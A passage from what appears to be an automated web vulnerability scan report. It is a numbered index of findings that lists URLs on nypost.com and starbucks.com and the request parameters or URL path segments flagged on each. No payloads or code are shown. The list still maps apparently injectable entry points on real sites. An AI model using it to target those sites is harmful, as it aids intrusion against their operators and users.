1.516. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_general.css [REST URL parameter 6]

1.517. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_general.css [REST URL parameter 7]

1.518. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css [REST URL parameter 2]

1.519. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css [REST URL parameter 3]

1.520. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css [REST URL parameter 4]

1.521. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css [REST URL parameter 5]

1.522. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css [REST URL parameter 6]

1.523. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css [REST URL parameter 7]

1.524. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 2]

1.525. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 3]

1.526. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 4]

1.527. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 5]

1.528. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 6]

1.529. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 2]

1.530. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 3]

1.531. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 4]

1.532. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 5]

1.533. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 6]

1.534. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 2]

1.535. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 3]

1.536. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 4]

1.537. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 5]

1.538. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 6]

1.539. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js [REST URL parameter 2]

1.540. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js [REST URL parameter 3]

1.541. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js [REST URL parameter 4]

1.542. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js [REST URL parameter 5]

1.543. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js [REST URL parameter 6]

1.544. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js [REST URL parameter 7]

1.545. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 2]

1.546. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 3]

1.547. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 4]

1.548. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 5]

1.549. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 6]

1.550. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js [REST URL parameter 2]

1.551. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js [REST URL parameter 3]

1.552. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js [REST URL parameter 4]

1.553. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js [REST URL parameter 5]

1.554. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js [REST URL parameter 6]

1.555. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 2]

1.556. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 3]

1.557. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 4]

1.558. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 5]

1.559. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 6]

1.560. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 2]

1.561. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 3]

1.562. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 4]

1.563. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 5]

1.564. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 6]

1.565. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 2]

1.566. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 3]

1.567. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 4]

1.568. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 5]

1.569. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 6]

1.570. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 2]

1.571. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 3]

1.572. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 4]

1.573. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 5]

1.574. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 6]

1.575. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 2]

1.576. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 3]

1.577. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 4]

1.578. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 5]

1.579. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 6]

1.580. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 2]

1.581. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 3]

1.582. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 4]

1.583. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 5]

1.584. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/migration.js [REST URL parameter 6]

1.585. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 2]

1.586. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 3]

1.587. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 4]

1.588. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 5]

1.589. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js [REST URL parameter 6]

1.590. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/unica.js [REST URL parameter 2]

1.591. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/unica.js [REST URL parameter 3]

1.592. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/unica.js [REST URL parameter 4]

1.593. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/unica.js [REST URL parameter 5]

1.594. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/unica.js [REST URL parameter 6]

1.595. http://www.nypost.com/t/Andy%20Pettitte%20 [REST URL parameter 2]

1.596. http://www.nypost.com/t/Andy%20Pettitte%20 [REST URL parameter 2]

1.597. http://www.nypost.com/t/Charlie%20Sheen [REST URL parameter 2]

1.598. http://www.nypost.com/t/Charlie%20Sheen [REST URL parameter 2]

1.599. http://www.nypost.com/t/Charlie%20Sheen [REST URL parameter 2]

1.600. http://www.nypost.com/t/Fred%20Wilpon [REST URL parameter 2]

1.601. http://www.nypost.com/t/Fred%20Wilpon [REST URL parameter 2]

1.602. http://www.nypost.com/t/Fred%20Wilpon [REST URL parameter 2]

1.603. http://www.nypost.com/t/James%20Franco [REST URL parameter 2]

1.604. http://www.nypost.com/t/James%20Franco [REST URL parameter 2]

1.605. http://www.nypost.com/t/James%20Franco [REST URL parameter 2]

1.606. http://www.nypost.com/t/Justin%20Bieber [REST URL parameter 2]

1.607. http://www.nypost.com/t/Justin%20Bieber [REST URL parameter 2]

1.608. http://www.nypost.com/upost [name of an arbitrarily supplied request parameter]

1.609. http://www.nypost.com/video [channel parameter]

1.610. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

1.611. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

1.612. http://www.starbucks.com/about-us [name of an arbitrarily supplied request parameter]

1.613. http://www.starbucks.com/about-us/company-information [name of an arbitrarily supplied request parameter]

1.614. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement [name of an arbitrarily supplied request parameter]

1.615. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use [name of an arbitrarily supplied request parameter]

1.616. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility [name of an arbitrarily supplied request parameter]

1.617. http://www.starbucks.com/about-us/company-information/product-advisories [name of an arbitrarily supplied request parameter]

1.618. http://www.starbucks.com/about-us/our-heritage [name of an arbitrarily supplied request parameter]

1.619. http://www.starbucks.com/business [name of an arbitrarily supplied request parameter]

1.620. http://www.starbucks.com/business/foodservice [name of an arbitrarily supplied request parameter]

1.621. http://www.starbucks.com/business/international-stores [name of an arbitrarily supplied request parameter]

1.622. http://www.starbucks.com/business/licensed-stores [name of an arbitrarily supplied request parameter]

1.623. http://www.starbucks.com/business/office-coffee [name of an arbitrarily supplied request parameter]

1.624. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]

1.625. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]

1.626. http://www.starbucks.com/career-center/career-diversity [name of an arbitrarily supplied request parameter]

1.627. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]

1.628. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]

1.629. http://www.starbucks.com/career-center/international-positions [name of an arbitrarily supplied request parameter]

1.630. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]

1.631. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]

1.632. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

1.633. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

1.634. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]

1.635. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]

1.636. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]

1.637. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]

1.638. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]

1.639. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]

1.640. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]

1.641. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]

1.642. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

1.643. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

1.644. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

1.645. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]

1.646. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]

1.647. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]

1.648. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]

1.649. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]

1.650. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]

1.651. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

1.652. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

1.653. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]

1.654. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

1.655. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]

1.656. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

1.657. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

1.658. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

1.659. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

1.660. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

1.661. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

1.662. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]

1.663. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast [name of an arbitrarily supplied request parameter]

1.664. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

1.665. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

1.666. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

1.667. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

1.668. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]

1.669. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]

1.670. http://www.starbucks.com/coffeehouse/community [name of an arbitrarily supplied request parameter]

1.671. http://www.starbucks.com/coffeehouse/community/mystarbucksidea [name of an arbitrarily supplied request parameter]

1.672. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]

1.673. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]

1.674. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]

1.675. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]

1.676. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks [name of an arbitrarily supplied request parameter]

1.677. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile [name of an arbitrarily supplied request parameter]

1.678. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb [name of an arbitrarily supplied request parameter]

1.679. http://www.starbucks.com/coffeehouse/store-design [name of an arbitrarily supplied request parameter]

1.680. http://www.starbucks.com/coffeehouse/wireless-internet [name of an arbitrarily supplied request parameter]

1.681. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada [name of an arbitrarily supplied request parameter]

1.682. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network [name of an arbitrarily supplied request parameter]

1.683. http://www.starbucks.com/customer-service [name of an arbitrarily supplied request parameter]

1.684. http://www.starbucks.com/customer-service/contact [name of an arbitrarily supplied request parameter]

1.685. http://www.starbucks.com/customer-service/faqs/card [name of an arbitrarily supplied request parameter]

1.686. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]

1.687. http://www.starbucks.com/customer-service/faqs/coffeehouse [name of an arbitrarily supplied request parameter]

1.688. http://www.starbucks.com/customer-service/faqs/menu [name of an arbitrarily supplied request parameter]

1.689. http://www.starbucks.com/customer-service/faqs/responsibility [name of an arbitrarily supplied request parameter]

1.690. http://www.starbucks.com/customer-service/faqs/shop [name of an arbitrarily supplied request parameter]

1.691. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]

1.692. http://www.starbucks.com/menu/ [name of an arbitrarily supplied request parameter]

1.693. http://www.starbucks.com/menu/catalog/nutrition [name of an arbitrarily supplied request parameter]

1.694. http://www.starbucks.com/menu/catalog/nutrition [wellness parameter]

1.695. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]

1.696. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha [name of an arbitrarily supplied request parameter]

1.697. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha [name of an arbitrarily supplied request parameter]

1.698. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla [name of an arbitrarily supplied request parameter]

1.699. http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

1.700. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

1.701. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino [name of an arbitrarily supplied request parameter]

1.702. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot [name of an arbitrarily supplied request parameter]

1.703. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot [name of an arbitrarily supplied request parameter]

1.704. http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

1.705. http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

1.706. http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day [name of an arbitrarily supplied request parameter]

1.707. http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto [name of an arbitrarily supplied request parameter]

1.708. http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee [name of an arbitrarily supplied request parameter]

1.709. http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler [name of an arbitrarily supplied request parameter]

1.710. http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]

1.711. http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee [name of an arbitrarily supplied request parameter]

1.712. http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast [name of an arbitrarily supplied request parameter]

1.713. http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate [name of an arbitrarily supplied request parameter]

1.714. http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate [name of an arbitrarily supplied request parameter]

1.715. http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate [name of an arbitrarily supplied request parameter]

1.716. http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate [name of an arbitrarily supplied request parameter]

1.717. http://www.starbucks.com/menu/drinks/espresso/caffe-americano [name of an arbitrarily supplied request parameter]

1.718. http://www.starbucks.com/menu/drinks/espresso/caffe-latte [name of an arbitrarily supplied request parameter]

1.719. http://www.starbucks.com/menu/drinks/espresso/caffe-mocha [name of an arbitrarily supplied request parameter]

1.720. http://www.starbucks.com/menu/drinks/espresso/cappuccino [name of an arbitrarily supplied request parameter]

1.721. http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte [name of an arbitrarily supplied request parameter]

1.722. http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato [name of an arbitrarily supplied request parameter]

1.723. http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

1.724. http://www.starbucks.com/menu/drinks/espresso/eggnog-latte [name of an arbitrarily supplied request parameter]

1.725. http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna [name of an arbitrarily supplied request parameter]

1.726. http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato [name of an arbitrarily supplied request parameter]

1.727. http://www.starbucks.com/menu/drinks/espresso/espresso-shot [name of an arbitrarily supplied request parameter]

1.728. http://www.starbucks.com/menu/drinks/espresso/flavored-latte [name of an arbitrarily supplied request parameter]

1.729. http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte [name of an arbitrarily supplied request parameter]

1.730. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano [name of an arbitrarily supplied request parameter]

1.731. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte [name of an arbitrarily supplied request parameter]

1.732. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha [name of an arbitrarily supplied request parameter]

1.733. http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato [name of an arbitrarily supplied request parameter]

1.734. http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

1.735. http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte [name of an arbitrarily supplied request parameter]

1.736. http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte [name of an arbitrarily supplied request parameter]

1.737. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha [name of an arbitrarily supplied request parameter]

1.738. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

1.739. http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte [name of an arbitrarily supplied request parameter]

1.740. http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte [name of an arbitrarily supplied request parameter]

1.741. http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha [name of an arbitrarily supplied request parameter]

1.742. http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

1.743. http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha [name of an arbitrarily supplied request parameter]

1.744. http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

1.745. http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte [name of an arbitrarily supplied request parameter]

1.746. http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato [name of an arbitrarily supplied request parameter]

1.747. http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

1.748. http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte [name of an arbitrarily supplied request parameter]

1.749. http://www.starbucks.com/menu/drinks/espresso/toffee-mocha [name of an arbitrarily supplied request parameter]

1.750. http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha [name of an arbitrarily supplied request parameter]

1.751. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]

1.752. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

1.753. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

1.754. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

1.755. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

1.756. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

1.757. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

1.758. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

1.759. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

1.760. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

1.761. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

1.762. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

1.763. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

1.764. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

1.765. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

1.766. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

1.767. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

1.768. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

1.769. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

1.770. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

1.771. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

1.772. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

1.773. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

1.774. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

1.775. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

1.776. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

1.777. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

1.778. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

1.779. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

1.780. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

1.781. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

1.782. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

1.783. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice [name of an arbitrarily supplied request parameter]

1.784. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice [name of an arbitrarily supplied request parameter]

1.785. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk [name of an arbitrarily supplied request parameter]

1.786. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk [name of an arbitrarily supplied request parameter]

1.787. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice [name of an arbitrarily supplied request parameter]

